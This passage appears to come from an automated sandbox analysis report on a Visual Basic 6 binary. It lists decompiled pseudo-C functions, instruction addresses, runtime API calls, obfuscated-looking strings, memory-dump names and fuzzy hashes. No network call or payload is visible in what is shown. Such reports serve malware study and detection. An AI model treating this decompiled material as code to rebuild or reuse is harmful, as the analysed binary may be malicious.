				intOrPtr* _v48;
				signed int _v52;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _t75;
				signed int _t79;
				signed int _t82;
				signed int _t85;
				signed int _t91;
				signed int _t96;
				intOrPtr _t105;
				void* _t108;
				void* _t110;
				intOrPtr _t111;

				_t111 = _t110 - 0xc;
				 *[fs:0x0] = _t111;
				L004015E0();
				_v16 = _t111;
				_v12 = 0x401420;
				_v8 = 0;
				_t75 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4015e6, _t108);
				_push(0x40ee84);
				_push(0x40ecc0);
				_push(0);
				L00401712();
				if(_t75 != 1) {
					if( *0x41b2d4 != 0) {
						_v68 = 0x41b2d4;
					} else {
						_push(0x41b2d4);
						_push(0x40ed14);
						L0040185C();
						_v68 = 0x41b2d4;
					}
					_v40 =  *_v68;
					_t91 =  *((intOrPtr*)( *_v40 + 0x4c))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t91;
					if(_v44 >= 0) {
						_v72 = _v72 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40ed04);
						_push(_v40);
						_push(_v44);
						L00401856();
						_v72 = _t91;
					}
					_v48 = _v36;
					_t96 =  *((intOrPtr*)( *_v48 + 0x24))(_v48, L"Spades4", L"Koopererendes",  &_v32);
					asm("fclex");
					_v52 = _t96;
					if(_v52 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x40eec0);
						_push(_v48);
						_push(_v52);
						L00401856();
						_v76 = _t96;
					}
					_t75 = _v32;
					_v64 = _t75;
					_v32 = _v32 & 0x00000000;
					_t105 = _v64;
					L00401814();
					L00401850();
				}
				_push(0x40eed4);
				L00401706();
				_push(_t105);
				_push(_t75);
				L0040170C();
				if(_t75 != 0) {
					_t85 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x478e);
					asm("fclex");
					_v40 = _t85;
					if(_v40 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x40e734);
						_push(_a4);
						_push(_v40);
						L00401856();
						_v80 = _t85;
					}
				}
				if( *0x41b010 != 0) {
					_v84 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v84 = 0x41b010;
				}
				_t79 =  &_v36;
				L00401862();
				_v40 = _t79;
				_t82 =  *((intOrPtr*)( *_v40 + 0x190))(_v40, _t79,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x308))( *_v84));
				asm("fclex");
				_v44 = _t82;
				if(_v44 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x40eed8);
					_push(_v40);
					_push(_v44);
					L00401856();
					_v88 = _t82;
				}
				L00401850();
				asm("wait");
				_push(0x416154);
				L0040182C();
				return _t82;
			}

0x00415f35
0x00415f44
0x00415f4e
0x00415f56
0x00415f59
0x00415f60
0x00415f6f
0x00415f72
0x00415f77
0x00415f7c
0x00415f7e
0x00415f87
0x00415f94
0x00415fae
0x00415f96
0x00415f96
0x00415f9b
0x00415fa0
0x00415fa5
0x00415fa5
0x00415fba
0x00415fc9
0x00415fcc
0x00415fce
0x00415fd5
0x00415fee
0x00415fd7
0x00415fd7
0x00415fd9
0x00415fde
0x00415fe1
0x00415fe4
0x00415fe9
0x00415fe9
0x00415ff5
0x0041600e
0x00416011
0x00416013
0x0041601a
0x00416033
0x0041601c
0x0041601c
0x0041601e
0x00416023
0x00416026
0x00416029
0x0041602e
0x0041602e
0x00416037
0x0041603a
0x0041603d
0x00416041
0x00416047
0x0041604f
0x0041604f
0x00416054
0x00416059
0x0041605e
0x0041605f
0x00416066
0x0041606d
0x0041607c
0x00416082
0x00416084
0x0041608b
0x004160a7
0x0041608d
0x0041608d
0x00416092
0x00416097
0x0041609a
0x0041609d
0x004160a2
0x004160a2
0x0041608b
0x004160b2
0x004160cc
0x004160b4
0x004160b4
0x004160b9
0x004160be
0x004160c3
0x004160c3
0x004160e7
0x004160eb
0x004160f0
0x004160fb
0x00416101
0x00416103
0x0041610a
0x00416126
0x0041610c
0x0041610c
0x00416111
0x00416116
0x00416119
0x0041611c
0x00416121
0x00416121
0x0041612d
0x00416132
0x00416133
0x0041614e
0x00416153

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00415F4E
__vbaStrComp.MSVBVM60(00000000,0040ECC0,0040EE84,?,?,?,?,004015E6), ref: 00415F7E
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,00000000,0040ECC0,0040EE84,?,?,?,?,004015E6), ref: 00415FA0
__vbaHresultCheckObj.MSVBVM60(00000000,0040EE84,0040ED04,0000004C), ref: 00415FE4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040EEC0,00000024), ref: 00416029
__vbaStrMove.MSVBVM60(00000000,00000000,0040EEC0,00000024), ref: 00416047
__vbaFreeObj.MSVBVM60(00000000,00000000,0040EEC0,00000024), ref: 0041604F
__vbaCyStr.MSVBVM60(0040EED4,00000000,0040ECC0,0040EE84,?,?,?,?,004015E6), ref: 00416059
__vbaFpCmpCy.MSVBVM60(00000000,?,0040EED4,00000000,0040ECC0,0040EE84,?,?,?,?,004015E6), ref: 00416066
__vbaHresultCheckObj.MSVBVM60(00000000,00401420,0040E734,00000254,?,0040EED4,00000000,0040ECC0), ref: 0041609D
__vbaNew2.MSVBVM60(0040F3CC,p"w,00000000,?,0040EED4,00000000,0040ECC0,0040EE84,?,?,?,?,004015E6), ref: 004160BE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004160EB
__vbaHresultCheckObj.MSVBVM60(00000000,0040EE84,0040EED8,00000190), ref: 0041611C
__vbaFreeObj.MSVBVM60(00000000,0040EE84,0040EED8,00000190), ref: 0041612D
__vbaFreeStr.MSVBVM60(00416154), ref: 0041614E

Strings

Spades4, xrefs: 00416001
p"w, xrefs: 004160AB, 004160B4, 004160C3, 004160CC
Koopererendes, xrefs: 00415FFC

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$ChkstkCompMove
String ID: Koopererendes$Spades4$p"w
API String ID: 2379353477-3226772565
Opcode ID: a2afa6275157e7bc46b600307360dd14f99dd35b2f5341cbb55e97acb516cb03
Instruction ID: f5b9c2ac686135de44de6798578fa0a5cc36dd8b74c0de5a8a453ca85e1d4e25
Opcode Fuzzy Hash: a2afa6275157e7bc46b600307360dd14f99dd35b2f5341cbb55e97acb516cb03
Instruction Fuzzy Hash: 5151F471900208EFCB00EF95C949BDDBBB4FF08704F20846AF515BB2A1D77999859B68

Uniqueness

Uniqueness Score: -1.00%

Function 00413F82, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413F82(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v32;
				char* _v40;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				char* _t82;
				char* _t83;
				signed int _t86;
				intOrPtr _t108;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t108;
				_push(0x3c);
				L004015E0();
				_v12 = _t108;
				_v8 = 0x4012f0;
				L00401820();
				if( *0x41b010 != 0) {
					_v64 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v64 = 0x41b010;
				}
				_t68 =  &_v32;
				L00401862();
				_v52 = _t68;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t72 =  *((intOrPtr*)( *_v52 + 0x1b0))(_v52, 0x10, _t68,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x320))( *_v64));
				asm("fclex");
				_v56 = _t72;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x40eaf4);
					_push(_v52);
					_push(_v56);
					L00401856();
					_v68 = _t72;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v72 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v72 = 0x41b010;
				}
				_t76 =  &_v32;
				L00401862();
				_v52 = _t76;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t80 =  *((intOrPtr*)( *_v52 + 0x1c8))(_v52, 0x10, _t76,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x33c))( *_v72));
				asm("fclex");
				_v56 = _t80;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40ea64);
					_push(_v52);
					_push(_v56);
					L00401856();
					_v76 = _t80;
				}
				L00401850();
				_v40 =  &_v28;
				_v48 = 0x6003;
				_t82 =  &_v48;
				_push(_t82);
				L004017D8();
				if(_t82 != 0xffff) {
					_t86 =  *((intOrPtr*)( *_a4 + 0x728))(_a4);
					_v52 = _t86;
					if(_v52 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x728);
						_push(0x40e764);
						_push(_a4);
						_push(_v52);
						L00401856();
						_v80 = _t86;
					}
				}
				_push(0x41417b);
				L0040182C();
				_t83 =  &_v28;
				_push(_t83);
				_push(0);
				L004017DE();
				return _t83;
			}

0x00413f87
0x00413f92
0x00413f93
0x00413f9a
0x00413f9d
0x00413fa5
0x00413fa8
0x00413fb5
0x00413fc1
0x00413fdb
0x00413fc3
0x00413fc3
0x00413fc8
0x00413fcd
0x00413fd2
0x00413fd2
0x00413ff6
0x00413ffa
0x00413fff
0x00414002
0x00414009
0x00414013
0x0041401d
0x0041401e
0x0041401f
0x00414020
0x00414029
0x0041402f
0x00414031
0x00414038
0x00414054
0x0041403a
0x0041403a
0x0041403f
0x00414044
0x00414047
0x0041404a
0x0041404f
0x0041404f
0x0041405b
0x00414067
0x00414081
0x00414069
0x00414069
0x0041406e
0x00414073
0x00414078
0x00414078
0x0041409c
0x004140a0
0x004140a5
0x004140a8
0x004140af
0x004140b9
0x004140c3
0x004140c4
0x004140c5
0x004140c6
0x004140cf
0x004140d5
0x004140d7
0x004140de
0x004140fa
0x004140e0
0x004140e0
0x004140e5
0x004140ea
0x004140ed
0x004140f0
0x004140f5
0x004140f5
0x00414101
0x00414109
0x0041410c
0x00414113
0x00414116
0x00414117
0x00414120
0x0041412a
0x00414130
0x00414137
0x00414153
0x00414139
0x00414139
0x0041413e
0x00414143
0x00414146
0x00414149
0x0041414e
0x0041414e
0x00414137
0x00414157
0x0041416a
0x0041416f
0x00414172
0x00414173
0x00414175
0x0041417a

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00413F9D
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00413FB5
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 00413FCD
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00413FFA
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414013
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAF4,000001B0), ref: 0041404A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041405B
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414073
__vbaObjSet.MSVBVM60(?,00000000), ref: 004140A0
__vbaChkstk.MSVBVM60(?,00000000), ref: 004140B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA64,000001C8), ref: 004140F0
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414101
#556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414117
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E764,00000728), ref: 00414149
__vbaFreeStr.MSVBVM60(0041417B,00006003), ref: 0041416A
__vbaAryDestruct.MSVBVM60(00000000,?,0041417B,00006003), ref: 00414175

Strings

p"w, xrefs: 00413FBA, 00413FC3, 00413FD2, 00413FDB, 00414060, 00414069, 00414078, 00414081

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresult$New2$#556CopyDestruct
String ID: p"w
API String ID: 3485901174-3261273085
Opcode ID: f2ba9fd999d610cefe2bb01a738b9484c6aaa1f1ebca4e504b5d57870dba2168
Instruction ID: 9c3d2ddcacbcf3d9485749ee5e1a7114142a8ab60402ad6ed225cd9731e428d1
Opcode Fuzzy Hash: f2ba9fd999d610cefe2bb01a738b9484c6aaa1f1ebca4e504b5d57870dba2168
Instruction Fuzzy Hash: C9511671D00208AFCB14EFA1C885BDEBBB5FF08704F20442AF511BB2A0D7B95A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418CBA, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00418CBA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				char _v64;
				char* _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				short _t55;
				signed int _t59;
				signed int _t62;
				signed int _t66;
				signed int _t69;
				signed int _t72;
				intOrPtr _t89;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t89;
				_push(0x74);
				L004015E0();
				_v12 = _t89;
				_v8 = 0x401538;
				L00401820();
				_v40 = 0x80020004;
				_v48 = 0xa;
				_t55 =  &_v48;
				_push(_t55);
				L0040169A();
				_v24 = _t55;
				L00401838();
				_v88 = L"7:7:7";
				_v96 = 8;
				L004017AE();
				_push( &_v48);
				_push( &_v64);
				L00401694();
				_v104 = 7;
				_v112 = 0x8002;
				_push( &_v64);
				_t59 =  &_v112;
				_push(_t59);
				L00401796();
				_v116 = _t59;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L004017BA();
				_t62 = _v116;
				if(_t62 != 0) {
					L0040172A();
					_t72 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t62);
					asm("fclex");
					_v116 = _t72;
					if(_v116 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40e734);
						_push(_a4);
						_push(_v116);
						L00401856();
						_v128 = _t72;
					}
				}
				if( *0x41b010 != 0) {
					_v132 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v132 = 0x41b010;
				}
				_t66 =  &_v32;
				L00401862();
				_v116 = _t66;
				_t69 =  *((intOrPtr*)( *_v116 + 0x21c))(_v116, _t66,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x330))( *_v132));
				asm("fclex");
				_v120 = _t69;
				if(_v120 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x21c);
					_push(0x40ea9c);
					_push(_v116);
					_push(_v120);
					L00401856();
					_v136 = _t69;
				}
				L00401850();
				asm("wait");
				_push(0x418e6e);
				L0040182C();
				return _t69;
			}

0x00418cbf
0x00418cca
0x00418ccb
0x00418cd2
0x00418cd5
0x00418cdd
0x00418ce0
0x00418ced
0x00418cf2
0x00418cf9
0x00418d00
0x00418d03
0x00418d04
0x00418d09
0x00418d10
0x00418d15
0x00418d1c
0x00418d29
0x00418d31
0x00418d35
0x00418d36
0x00418d3b
0x00418d42
0x00418d4c
0x00418d4d
0x00418d50
0x00418d51
0x00418d56
0x00418d5d
0x00418d61
0x00418d62
0x00418d64
0x00418d6c
0x00418d72
0x00418d7a
0x00418d88
0x00418d8b
0x00418d8d
0x00418d94
0x00418dad
0x00418d96
0x00418d96
0x00418d98
0x00418d9d
0x00418da0
0x00418da3
0x00418da8
0x00418da8
0x00418d94
0x00418db8
0x00418dd2
0x00418dba
0x00418dba
0x00418dbf
0x00418dc4
0x00418dc9
0x00418dc9
0x00418ded
0x00418df1
0x00418df6
0x00418e01
0x00418e07
0x00418e09
0x00418e10
0x00418e2f
0x00418e12
0x00418e12
0x00418e17
0x00418e1c
0x00418e1f
0x00418e22
0x00418e27
0x00418e27
0x00418e39
0x00418e3e
0x00418e3f
0x00418e68
0x00418e6d

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00418CD5
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00418CED
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,004015E6), ref: 00418D04
__vbaFreeVar.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,004015E6), ref: 00418D10
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 00418D29
#543.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 00418D36
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,0000000A), ref: 00418D51
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00008002,?,?,?,?,0000000A), ref: 00418D64
__vbaFpI4.MSVBVM60 ref: 00418D7A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E734,00000064), ref: 00418DA3
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418DC4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418DF1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,0000021C), ref: 00418E22
__vbaFreeObj.MSVBVM60(00000000,?,0040EA9C,0000021C), ref: 00418E39
__vbaFreeStr.MSVBVM60(00418E6E), ref: 00418E68

Strings

7:7:7, xrefs: 00418D15
p"w, xrefs: 00418DB1, 00418DBA, 00418DC9, 00418DD2

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#543#648ChkstkCopyListNew2
String ID: 7:7:7$p"w
API String ID: 3820034884-1896013575
Opcode ID: 764c35c2ff9390adcd2c8d52cb4f461ed556f5b3ecf3080277469ac2469de4cd
Instruction ID: f356da2639527b795834c8df2f1c6dbdae3aa3d10bc4cde6364017628089fcee
Opcode Fuzzy Hash: 764c35c2ff9390adcd2c8d52cb4f461ed556f5b3ecf3080277469ac2469de4cd
Instruction Fuzzy Hash: 4341E871D00208ABCB14EFA5C845BDEBBB8FF18704F20852EE115BB1A1EB785A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00416326, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00416326(void* __ebx, void* __edi, void* __esi, signed long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v44;
				char* _v68;
				char _v76;
				char _v80;
				void* _v84;
				signed char _v88;
				signed int _v92;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed char _v116;
				signed long long _v124;
				signed int _v128;
				signed int _v132;
				char* _t76;
				signed int _t79;
				short _t82;
				signed int _t83;
				char* _t87;
				signed char _t91;
				intOrPtr _t103;
				void* _t107;
				void* _t109;
				intOrPtr _t110;
				signed long long _t112;
				signed long long _t114;

				_t112 = __fp0;
				_t110 = _t109 - 0xc;
				 *[fs:0x0] = _t110;
				L004015E0();
				_v16 = _t110;
				_v12 = 0x401448;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4015e6, _t107);
				L004016FA();
				if( *0x41b010 != 0) {
					_v104 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v104 = 0x41b010;
				}
				_t76 =  &_v28;
				L00401862();
				_v84 = _t76;
				_t79 =  *((intOrPtr*)( *_v84 + 0x128))(_v84, _t76,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x314))( *_v104));
				asm("fclex");
				_v88 = _t79;
				if(_v88 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40eb80);
					_push(_v84);
					_push(_v88);
					L00401856();
					_v108 = _t79;
				}
				L00401850();
				_push( &_v44);
				L004016F4();
				_v68 = L"Unoffensively";
				_v76 = 0x8008;
				_push( &_v44);
				_t82 =  &_v76;
				_push(_t82);
				L0040174E();
				_v84 = _t82;
				L00401838();
				_t83 = _v84;
				if(_t83 == 0) {
					L19:
					asm("wait");
					_push(0x416537);
					return _t83;
				} else {
					if( *0x41b010 != 0) {
						_v112 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v112 = 0x41b010;
					}
					_t103 =  *((intOrPtr*)( *_v112));
					_t87 =  &_v28;
					L00401862();
					_v84 = _t87;
					_t91 =  *((intOrPtr*)( *_v84 + 0x128))(_v84,  &_v80, _t87,  *((intOrPtr*)(_t103 + 0x338))( *_v112));
					asm("fclex");
					_v88 = _t91;
					if(_v88 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x128);
						_push(0x40eae4);
						_push(_v84);
						_push(_v88);
						L00401856();
						_v116 = _t91;
					}
					asm("fild dword [ebp-0x4c]");
					_v124 = _t112;
					_t114 = _v124 *  *0x401440;
					asm("fnstsw ax");
					if((_t91 & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v128 = _t114;
						_v92 = _v128;
						_t83 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t103);
						asm("fclex");
						_v92 = _t83;
						if(_v92 >= 0) {
							_v132 = _v132 & 0x00000000;
						} else {
							_push(0x84);
							_push(0x40e734);
							_push(_a4);
							_push(_v92);
							L00401856();
							_v132 = _t83;
						}
						L00401850();
						goto L19;
					}
				}
				L1:
				return __imp____vbaFPException();
			}

0x00416326
0x00416329
0x00416338
0x00416342
0x0041634a
0x0041634d
0x00416354
0x00416363
0x00416366
0x00416372
0x0041638c
0x00416374
0x00416374
0x00416379
0x0041637e
0x00416383
0x00416383
0x004163a7
0x004163ab
0x004163b0
0x004163bb
0x004163c1
0x004163c3
0x004163ca
0x004163e6
0x004163cc
0x004163cc
0x004163d1
0x004163d6
0x004163d9
0x004163dc
0x004163e1
0x004163e1
0x004163ed
0x004163f5
0x004163f6
0x004163fb
0x00416402
0x0041640c
0x0041640d
0x00416410
0x00416411
0x00416416
0x0041641d
0x00416422
0x00416428
0x00416513
0x00416513
0x00416514
0x00000000
0x0041642e
0x00416435
0x0041644f
0x00416437
0x00416437
0x0041643c
0x00416441
0x00416446
0x00416446
0x00416460
0x0041646a
0x0041646e
0x00416473
0x00416482
0x00416488
0x0041648a
0x00416491
0x004164ad
0x00416493
0x00416493
0x00416498
0x0041649d
0x004164a0
0x004164a3
0x004164a8
0x004164a8
0x004164b1
0x004164b4
0x004164ba
0x004164c0
0x004164c4
0x00000000
0x004164ca
0x004164ca
0x004164d1
0x004164dc
0x004164e2
0x004164e4
0x004164eb
0x00416507
0x004164ed
0x004164ed
0x004164f2
0x004164f7
0x004164fa
0x004164fd
0x00416502
0x00416502
0x0041650e
0x00000000
0x0041650e
0x004164c4
0x004015ec
0x004015ec

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00416342
#598.MSVBVM60(?,?,?,?,004015E6), ref: 00416366
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 0041637E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004163AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB80,00000128), ref: 004163DC
__vbaFreeObj.MSVBVM60(00000000,?,0040EB80,00000128), ref: 004163ED
#670.MSVBVM60(?), ref: 004163F6
__vbaVarTstEq.MSVBVM60(00008008,?,?), ref: 00416411
__vbaFreeVar.MSVBVM60(00008008,?,?), ref: 0041641D
__vbaNew2.MSVBVM60(0040F3CC,p"w,00008008,?,?), ref: 00416441
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041646E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000128), ref: 004164A3
__vbaHresultCheckObj.MSVBVM60(00000000,00401448,0040E734,00000084), ref: 004164FD
__vbaFreeObj.MSVBVM60(00000000,00401448,0040E734,00000084), ref: 0041650E

Strings

Unoffensively, xrefs: 004163FB
p"w, xrefs: 0041636B, 00416374, 00416383, 0041638C, 0041642E, 00416437, 00416446, 0041644F

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#598#670Chkstk
String ID: Unoffensively$p"w
API String ID: 1083859603-3622844152
Opcode ID: 496ea3c541f87b339fcc4a3e8a8aa55c00cb892671f6601f33122c09696e68ad
Instruction ID: 26520f6ce6fd2b1f0263fd19b9260b68b003b68197fe7a274ca7fcff29a51328
Opcode Fuzzy Hash: 496ea3c541f87b339fcc4a3e8a8aa55c00cb892671f6601f33122c09696e68ad
Instruction Fuzzy Hash: F951F471900208EFCB10EFE1C845BDDBBB9FF08704F10842AE056BB2A5DB799595DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004175B6, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004175B6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				void* _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				char* _t78;
				signed int _t82;
				char* _t86;
				signed int _t89;
				signed int _t95;
				signed int _t100;
				short _t101;
				intOrPtr _t119;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_push(0x4c);
				L004015E0();
				_v12 = _t119;
				_v8 = 0x4014d0;
				if( *0x41b010 != 0) {
					_v72 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v72 = 0x41b010;
				}
				_t78 =  &_v28;
				L00401862();
				_v52 = _t78;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t82 =  *((intOrPtr*)( *_v52 + 0x174))(_v52, 0x10, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x338))( *_v72));
				asm("fclex");
				_v56 = _t82;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x174);
					_push(0x40eae4);
					_push(_v52);
					_push(_v56);
					L00401856();
					_v76 = _t82;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v80 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v80 = 0x41b010;
				}
				_t86 =  &_v28;
				L00401862();
				_v52 = _t86;
				_t89 =  *((intOrPtr*)( *_v52 + 0x170))(_v52, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x300))( *_v80));
				asm("fclex");
				_v56 = _t89;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40eae4);
					_push(_v52);
					_push(_v56);
					L00401856();
					_v84 = _t89;
				}
				L00401850();
				if( *0x41b2d4 != 0) {
					_v88 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v88 = 0x41b2d4;
				}
				_v52 =  *_v88;
				_t95 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v28);
				asm("fclex");
				_v56 = _t95;
				if(_v56 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v52);
					_push(_v56);
					L00401856();
					_v92 = _t95;
				}
				_v60 = _v28;
